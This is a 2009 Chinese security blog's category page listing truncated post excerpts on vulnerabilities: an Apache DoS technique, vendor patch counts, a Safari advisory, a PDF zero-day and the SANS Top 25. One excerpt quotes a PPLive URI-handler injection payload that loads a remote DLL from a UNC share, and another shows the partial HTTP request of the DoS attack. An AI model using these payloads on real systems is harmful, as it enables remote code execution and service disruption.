您正在查看 "Vulnerability" 分类下的文章
2009-06-19 09:41
SANS昨天报道了一个新的Apache D.o.S工具:http://isc.sans.org/diary.html?storyid=6601
大致原理是, 攻击者先发送一个包:
GET / HTTP/1.1\r\n
Host: host\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
Content-Length: 42\r\n
结 |
2009-06-16 10:51
2009-06-10 09:53
昨天Apple, 今天MS和Adobe, 狂放补丁, 加起来离100不远了。
为什么Mozilla,Oracle和Sun今天不发布点呢?这样轻轻松松凑个两三百,让用户爽一把。:)
Apple :50
Microsoft: 31
Adobe: 13 |
2009-06-09 08:35
Apple今天一口气补了四五十个.漏洞。。。。
各位赶紧检查一下自己的safari 0day有没有被patch吧.
APPLE-SA-2009-06-08-1 Safari 4.0
Safari 4.0 is now available and addresses the following:
CFNetwork
CVE-ID: CVE-2009-1704
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11,
Mac OS X v10.5.7, Mac OS X Server v10.5.7, Win |
2009-03-31 08:17
2009-03-28 20:08
2009-03-27 08:54
2009-03-22 09:22
2009-03-17 14:31
老外在milw0rm贴了一个pplive的漏洞,不知道是不是0day.
这个漏洞也有点意思,可以通过直接加载远程dll文件来利用.
http://milw0rm.com/exploits/8215
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3 |
2009-02-25 11:01
2009-02-20 11:19
据本台JI者村长报道, 根据 Shadowserver最新消息,有一个全能无敌PDF0 DAY正在传播, targeted attack.
受影响版本:
"All of our testing was done on Adobe Acrobat Reader 8.1.0, 8.1.1, 8.1.2, 8.1.3 ( latest release of 8), and 9.0.0 ( latest release of 9). We have not confirmed via testing that the exploit actually works on Adobe Acrobat (no |
2009-02-18 12:25
ISS X-Force根据他们漏洞库中的4万多漏洞的信息, 统计了自古以来,发现漏洞 数量最多的10位.

统计说,2008年之前,一直是r0t领先. 不过08年之后r0t好像"退休"了, 所以Luigi后来居上.
当然ISS自己也说了, 这个只能是根据公开数据来排的名, 所以那些无私的的地下工作者就没法计入了; 另外这个只是个数量排名, 而数量其实并不能说明多少 |
2009-02-05 17:48
2009-01-13 09:00
发布鸟。
http://www.sans.org/top25errors/
* CATEGORY: Insecure Interaction Between Components
- CWE-20: Improper Input Validation
- CWE-116: Improper Encoding or Escaping of Output
- CWE-89: Failure to Preserve SQL Query Structure (aka ‘SQL Injection’)
- CWE-79: Failure to Preserve Web Page Structure (aka ‘Cross-site Scripting’)
- CWE-78: Failure to Preserve OS Command Struct |
2008-12-31 09:18
|
| |